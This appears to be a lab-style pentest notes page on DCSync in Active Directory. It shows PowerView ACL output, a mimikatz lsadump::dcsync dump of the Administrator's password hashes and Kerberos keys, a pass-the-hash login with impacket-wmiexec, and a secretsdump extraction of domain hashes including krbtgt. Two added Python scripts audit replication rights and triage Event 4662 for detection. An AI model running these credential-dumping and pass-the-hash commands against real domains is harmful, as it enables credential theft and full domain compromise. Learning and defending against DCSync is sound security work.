How to identify if you have DCSync rights?
Tried the steps with PowerView from here https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync but I'm not sure how it should work. The output can be seen below. There is an error followed by some output.
{% code title="PowerView Get-ObjectAcl on the domain root" overflow="wrap" %}
PS C:\Tools> Get-ObjectAcl -DistinguishedName "dc=corp,dc=com" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

ERROR

Exception calling "Substring" with "1" argument(s): "StartIndex cannot be less than zero.
Parameter name: startIndex"
At C:\Tools\PowerView.ps1:8167 char:25
+ ... $IdentityDomain = $IdentityInstance.SubString($IdentityIn ...
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Get-DomainSearcher : Cannot validate argument on parameter 'Domain'. The argument is null or empty. Provide an argument that is not null or empty, and then try the command again.
At C:\Tools\PowerView.ps1:8170 char:56
+ ... $Searcher = Get-DomainSearcher @SearcherArguments
+                                    ~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Get-DomainSearcher], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Get-DomainSearcher

AceType               : AccessAllowed
ObjectDN              : DC=corp,DC=com
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
OpaqueLength          : 0
ObjectSID             : S-1-5-21-1987370270-658905905-1781884369
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-512
AccessMask            : 917949
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

AceType               : AccessAllowed
ObjectDN              : DC=corp,DC=com
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-1987370270-658905905-1781884369
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-519
AccessMask            : 983551
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

AceType               : AccessAllowed
ObjectDN              : DC=corp,DC=com
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength          : 0
ObjectSID             : S-1-5-21-1987370270-658905905-1781884369
InheritanceFlags      : ContainerInherit
BinaryLength          : 24
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-32-544
AccessMask            : 983485
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

AceType               : AccessAllowed
ObjectDN              : DC=corp,DC=com
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-1987370270-658905905-1781884369
InheritanceFlags      : None
BinaryLength          : 20
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-18
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed
{% endcode %}
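The question above is which of these ACEs actually confer the ability to replicate secrets, which is also the audit a defender runs on the domain root. As an added example (not from the original post, nor part of PowerView), the following Python parses Get-ObjectAcl -ResolveGUIDs output in the "Key : Value" layout shown above and groups rights per SID: GenericAll, or both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, means the principal can replicate now; WriteDacl or WriteOwner means it can grant itself those rights; a single replication right is flagged as partial. It assumes PowerView prints resolved extended-right names in an ObjectType field and that an ExtendedRight ACE with no ObjectType (or "All") grants every extended right, which is how the Domain Admins and Administrators entries above end up with replication rights. The sample records are constructed to mirror the output above, with the fields that do not affect the decision omitted, plus two hypothetical account SIDs (-1105 and -1106) to show the object-ACE case.

```python
"""Group ACEs per principal and decide which confer DCSync (directory replication) rights."""
import re
from collections import defaultdict

# Names PowerView -ResolveGUIDs prints for the replication control-access rights (assumption).
GET_CHANGES = "DS-Replication-Get-Changes"
GET_CHANGES_ALL = "DS-Replication-Get-Changes-All"
GET_CHANGES_FILTERED = "DS-Replication-Get-Changes-In-Filtered-Set"
REPLICATION_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}
SELF_GRANT_RIGHTS = {"WriteDacl", "WriteOwner"}  # enough to grant oneself the rights above
WELL_KNOWN = {"S-1-5-18": "NT AUTHORITY\\SYSTEM", "S-1-5-32-544": "BUILTIN\\Administrators"}
WELL_KNOWN_RIDS = {"512": "Domain Admins", "516": "Domain Controllers", "519": "Enterprise Admins"}
KV_RE = re.compile(r"^\s*(\w+)\s*:\s*(.*?)\s*$")


def parse_aces(text):
    """Split 'Key : Value' lines into one dict per ACE (records end at a blank line or repeated key)."""
    aces, cur = [], {}
    for line in text.splitlines():
        m = KV_RE.match(line)
        if not m or m.group(1) in cur:
            if cur:
                aces.append(cur)
            cur = {}
        if m:
            cur[m.group(1)] = m.group(2)
    if cur:
        aces.append(cur)
    return aces


def friendly_name(sid):
    """Resolve well-known SIDs/RIDs to names; unknown SIDs are returned unchanged."""
    return WELL_KNOWN.get(sid) or WELL_KNOWN_RIDS.get(sid.rsplit("-", 1)[-1], sid)


def assess(aces):
    """Return {sid: (verdict, sorted flags)} for principals holding DCSync-relevant rights."""
    flags_by_sid = defaultdict(set)
    for ace in aces:
        if not ace.get("AceType", "").startswith("AccessAllowed"):  # deny ACEs grant nothing
            continue
        rights = {r.strip() for r in ace.get("ActiveDirectoryRights", "").split(",")}
        flags = flags_by_sid[ace.get("SecurityIdentifier", "?")]
        flags |= rights & (SELF_GRANT_RIGHTS | {"GenericAll"})
        obj_type = ace.get("ObjectType", "")
        if "ExtendedRight" in rights and obj_type in REPLICATION_RIGHTS:
            flags.add(obj_type)
        elif "ExtendedRight" in rights and obj_type in ("", "All"):
            flags |= REPLICATION_RIGHTS  # no ObjectType: the ACE grants every extended right
    findings = {}
    for sid, flags in flags_by_sid.items():
        if "GenericAll" in flags or {GET_CHANGES, GET_CHANGES_ALL} <= flags:
            findings[sid] = ("DCSYNC", sorted(flags))          # can replicate secrets now
        elif flags & SELF_GRANT_RIGHTS:
            findings[sid] = ("CAN_GRANT_SELF", sorted(flags))  # one ACL edit away
        elif flags & REPLICATION_RIGHTS:
            findings[sid] = ("PARTIAL", sorted(flags))         # Get-Changes alone is not enough
    return findings


# Constructed sample mirroring the page's output (decision-irrelevant fields dropped),
# plus hypothetical object ACEs for made-up SIDs -1105 (both rights) and -1106 (one right).
SAMPLE = """\
AceType               : AccessAllowed
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-512

AceType               : AccessAllowed
ActiveDirectoryRights : GenericAll
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-519

AceType               : AccessAllowed
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
SecurityIdentifier    : S-1-5-32-544

AceType               : AccessAllowedObject
ActiveDirectoryRights : ExtendedRight
ObjectType            : DS-Replication-Get-Changes
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-1105

AceType               : AccessAllowedObject
ActiveDirectoryRights : ExtendedRight
ObjectType            : DS-Replication-Get-Changes-All
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-1105

AceType               : AccessAllowedObject
ActiveDirectoryRights : ExtendedRight
ObjectType            : DS-Replication-Get-Changes
SecurityIdentifier    : S-1-5-21-1987370270-658905905-1781884369-1106
"""

FINDINGS = assess(parse_aces(SAMPLE))

if __name__ == "__main__":
    for sid, (verdict, flags) in FINDINGS.items():
        print(f"{verdict:15} {friendly_name(sid):25} {', '.join(flags)}")
```

Run it against a real export by piping the PowerView output to a file and passing that text to parse_aces; any SID that comes back as DCSYNC or CAN_GRANT_SELF and is not a DC, a built-in admin group, or a known directory-sync account is worth a closer look.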
{% code title="Using mimikatz to dump hashes" overflow="wrap" lineNumbers="true" %}
mimikatz # lsadump::dcsync /domain:corp.com /user:corp\Administrator
[DC] 'corp.com' will be the domain
[DC] 'DC1.corp.com' will be the DC server
[DC] 'corp\Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 8/16/2022 5:27:22 PM
Object Security ID   : S-1-5-21-1987370270-658905905-1781884369-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 731b7c2aa33ef31284bed1e7895123de

* Primary:Kerberos-Newer-Keys *
    Default Salt : WIN-D74CT1583SRAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 56136fd5bbd512b3670c581ff98144a553888909a7bf8f0fd4c424b0d42b0cdc
      aes128_hmac       (4096) : 3d58eb136242c11643baf4ec85970250
      des_cbc_md5       (4096) : fd79dc380ee989a4
    OldCredentials
      aes256_hmac       (4096) : aefc3b3587d7f6786dd4bd53647bc7ce09148c3556172fd86d2eb24a59924248
      aes128_hmac       (4096) : bae2ca0a0a705c2b965e10321860f4ca
      des_cbc_md5       (4096) : 0e7c641c573ddac2

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WIN-D74CT1583SRAdministrator
    Credentials
      des_cbc_md5       : fd79dc380ee989a4
    OldCredentials
      des_cbc_md5       : 0e7c641c573ddac2

mimikatz #
{% endcode %}
Using the same pass-the-hash (PTH) technique as in the PTH section, with the NTLM hash found above:
{% code title="Log in with the PTH technique" overflow="wrap" lineNumbers="true" %}
/usr/bin/impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e [email protected]
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
corp\administrator
C:\>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3c34:78c3:e3d9:1a1d%14
IPv4 Address. . . . . . . . . . . : 192.168.235.70
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.235.254
{% endcode %}
{% code title="Dumping NTDS secrets with secretsdump.py (DRSUAPI method)" overflow="wrap" lineNumbers="true" %}
secretsdump.py htb/[email protected]
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
{% endcode %}
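The mimikatz lsadump::dcsync run and the secretsdump DRSUAPI run above leave the same trace on the domain controller: a Security Event 4662 in which the subject requests the replication control-access rights on the domain object, which is what DCSync detections key on. As an added example (not part of this page, mimikatz or Impacket), the following Python triages such events. It assumes the events were exported as JSON lines with the EventData fields flattened (EventID, SubjectUserName, SubjectDomainName, ObjectName, Properties), as a SIEM forwarder typically produces, and that the "Audit Directory Service Access" subcategory is enabled on the DCs, since no 4662 is written otherwise. The DC name DC1, the Azure AD Connect style account MSOL_0f1e2d3c, the user jdoe and all four sample events are constructed, and the Properties strings are simplified to the GUIDs that matter.

```python
"""Triage Windows Security Event 4662 records for DCSync-style replication requests."""
import json
import re

# Control-access right GUIDs that appear in the 4662 'Properties' field when a principal
# asks a DC to replicate directory data; these are the rights that lsadump::dcsync and
# secretsdump's DRSUAPI method exercise.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def expected_replicators(dc_names, sync_accounts=()):
    """Subjects that legitimately replicate: DC machine accounts plus vetted sync accounts."""
    return {f"{dc.upper()}$" for dc in dc_names} | {a.upper() for a in sync_accounts}


def replication_rights(properties):
    """Names of the replication rights referenced in a 4662 Properties string."""
    return sorted({REPLICATION_GUIDS[g.lower()] for g in GUID_RE.findall(properties or "")
                   if g.lower() in REPLICATION_GUIDS})


def triage_4662(records, allowlist):
    """Return one alert per 4662 that requests replication from a non-allow-listed subject."""
    alerts = []
    for rec in records:
        if rec.get("EventID") != 4662:
            continue
        rights = replication_rights(rec.get("Properties"))
        if not rights:
            continue  # ordinary object access, not a replication request
        subject = rec.get("SubjectUserName", "").upper()
        if subject in allowlist:
            continue  # DC-to-DC replication or a vetted directory-sync account
        alerts.append({
            "subject": f"{rec.get('SubjectDomainName', '')}\\{subject}",
            "object": rec.get("ObjectName", ""),
            "rights": rights,
            # Get-Changes-All is the right that returns secrets (hashes), so rank it highest.
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts


def load_events(text):
    """Parse a JSON-lines export into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample (not real logs): a DC replicating, a user account requesting secrets
# replication, an unrelated 4662 with a made-up attribute GUID, and a hypothetical
# Azure AD Connect account (MSOL_...) that is allow-listed below.
SAMPLE_EVENTS = """\
{"EventID": 4662, "SubjectUserName": "DC1$", "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com", "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP", "ObjectName": "CN=Users,DC=corp,DC=com", "Properties": "Read Property {aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"}
{"EventID": 4662, "SubjectUserName": "MSOL_0f1e2d3c", "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
"""

ALERTS = triage_4662(load_events(SAMPLE_EVENTS),
                     expected_replicators(["DC1"], sync_accounts=["MSOL_0f1e2d3c"]))

if __name__ == "__main__":
    for a in ALERTS:
        print(f"[{a['severity'].upper()}] {a['subject']} requested "
              f"{', '.join(a['rights'])} on {a['object']}")
```

The allow-list is the part that needs care in practice: DC machine accounts and directory-sync accounts (Azure AD Connect's MSOL_ account, for instance) request exactly these rights all day, so the rule has to be about who replicates, not whether replication happens; anything else asking for DS-Replication-Get-Changes-All is the signal.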